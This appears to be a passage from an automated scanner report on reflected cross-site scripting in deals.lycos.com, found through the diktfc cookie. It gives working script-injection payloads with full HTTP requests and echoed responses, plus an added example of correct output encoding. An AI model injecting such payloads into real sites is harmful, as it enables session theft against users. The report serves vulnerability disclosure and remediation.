P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:47 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/dating-services-445&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c53d"><script>alert(1)</script>985194847a&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 530f2"%3balert(1)//66373ee2c96 was submitted in the diktfc cookie. This input was echoed as 530f2";alert(1)//66373ee2c96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/digital-cameras-168 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A530f2"%3balert(1)//66373ee2c96; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47421
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ebbb"><script>alert(1)</script>5ed481c16d2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/digital-cameras-168 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ebbb"><script>alert(1)</script>5ed481c16d2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:53 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/digital-cameras-168&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ebbb"><script>alert(1)</script>5ed481c16d2&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df10"><script>alert(1)</script>decb6417e3f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/electronics-142 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8df10"><script>alert(1)</script>decb6417e3f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/electronics-142&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8df10"><script>alert(1)</script>decb6417e3f&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba404"%3balert(1)//a1b2a499f40 was submitted in the diktfc cookie. This input was echoed as ba404";alert(1)//a1b2a499f40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/electronics-142 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aba404"%3balert(1)//a1b2a499f40; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48973
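The following JavaScript is an added example; it is not code from the scanner report or from the Lycos application. It models the two sinks the diktfc findings describe, a double-quoted HTML attribute carrying a URL and a double-quoted JavaScript string literal inside a script block, renders them first with raw concatenation and then with output encoding chosen for each sink's grammar, and reproduces the scanner's "echoed unmodified" check against the two payloads quoted in the report. TRACKER_URL, the variable name tracker and the render functions are hypothetical; the rest of the application's markup is not modelled.

```javascript
// Added example, not code from the scanner report or the Lycos application.
// TRACKER_URL and the render functions are hypothetical stand-ins for the
// application's own sinks; the two payloads are the ones the report submitted.

const TRACKER_URL = 'http://tracker.example/p?c15='; // hypothetical attribute sink

// Report payloads. The script-context payload is shown URL-decoded, as the
// application echoed it (%3b -> ';').
const PAYLOAD_ATTR = '6d3fd"><script>alert(1)</script>7ca665b3883';
const PAYLOAD_JS = 'ba404";alert(1)//a1b2a499f40';

// Encoder for a quoted HTML attribute value.
function encodeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Encoder for a JavaScript string literal emitted inside a <script> block.
// JSON.stringify escapes quotes, backslashes and control characters; '<' is
// escaped as well so that a "</script>" inside the data cannot close the block
// (the HTML tokenizer does not honour JavaScript quoting).
function encodeJsString(s) {
  return JSON.stringify(String(s)).replace(/</g, '\\u003c');
}

// Vulnerable rendering: the raw cookie value is concatenated into both sinks,
// which is the behaviour the report's "echoed unmodified" findings describe.
function renderVulnerable(cookieValue) {
  const img = '<img src="' + TRACKER_URL + cookieValue + '" alt="tracker" />';
  const script = '<script>var tracker = "' + cookieValue + '";</script>';
  return img + '\n' + script;
}

// Hardened rendering: the attribute holds a URL, so the value is percent-encoded
// as a query component and the whole URL is then attribute-encoded; the script
// block receives a proper JavaScript string literal.
function renderHardened(cookieValue) {
  const url = TRACKER_URL + encodeURIComponent(cookieValue);
  const img = '<img src="' + encodeHtmlAttr(url) + '" alt="tracker" />';
  const script = '<script>var tracker = ' + encodeJsString(cookieValue) + ';</script>';
  return img + '\n' + script;
}

// The reflection check the scanner performs: is the payload present unmodified?
function reflectsUnmodified(html, payload) {
  return html.includes(payload);
}

// Number of <script> start tags in a fragment. The hardened render has exactly
// one (the application's own); the vulnerable render of PAYLOAD_ATTR has three,
// the application's own plus one injected copy in each of the two sinks.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

console.log('vulnerable:\n' + renderVulnerable(PAYLOAD_ATTR));
console.log('hardened:\n' + renderHardened(PAYLOAD_ATTR));
console.log('hardened script context:\n' + renderHardened(PAYLOAD_JS));
```

Each sink gets the encoder for its own grammar: percent-encoding and then attribute encoding for the URL inside the attribute, and string-literal escaping for the script block. An HTML-entity encoder applied inside a script block is the wrong tool, because the browser does not decode entities there and the value would reach the script corrupted, while the string-literal escaping above round-trips the original value (JSON.parse of the encoded literal returns it) without letting a quotation mark, a backslash or a closing script tag change the surrounding structure.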
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3fd"><script>alert(1)</script>7ca665b3883 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/financial-services-439 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6d3fd"><script>alert(1)</script>7ca665b3883; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/financial-services-439&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6d3fd"><script>alert(1)</script>7ca665b3883&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d716"%3balert(1)//059f898a8b was submitted in the diktfc cookie. This input was echoed as 9d716";alert(1)//059f898a8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/financial-services-439 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d716"%3balert(1)//059f898a8b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17219
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eb80"%3balert(1)//5af42826628 was submitted in the diktfc cookie. This input was echoed as 2eb80";alert(1)//5af42826628 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/food-and-drink-213 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2eb80"%3balert(1)//5af42826628; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31364
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86fb9"><script>alert(1)</script>f0965134d1e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/food-and-drink-213 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86fb9"><script>alert(1)</script>f0965134d1e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/food-and-drink-213&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86fb9"><script>alert(1)</script>f0965134d1e&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f84"><script>alert(1)</script>4a6d4c1536e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/gaming-and-toys-186 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A70f84"><script>alert(1)</script>4a6d4c1536e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/gaming-and-toys-186&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A70f84"><script>alert(1)</script>4a6d4c1536e&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d8a5"%3balert(1)//fe2e4db2273 was submitted in the diktfc cookie. This input was echoed as 5d8a5";alert(1)//fe2e4db2273 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/gaming-and-toys-186 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d8a5"%3balert(1)//fe2e4db2273; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47370
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0282"%3balert(1)//7489f873325 was submitted in the diktfc cookie. This input was echoed as e0282";alert(1)//7489f873325 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/gifts-flowers-and-cards-218 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae0282"%3balert(1)//7489f873325; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22858
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df85e"><script>alert(1)</script>a9f8ea40e17 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/gifts-flowers-and-cards-218 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adf85e"><script>alert(1)</script>a9f8ea40e17; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/gifts-flowers-and-cards-218&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adf85e"><script>alert(1)</script>a9f8ea40e17&cj=1" alt="tracker" />
...[SNIP]...
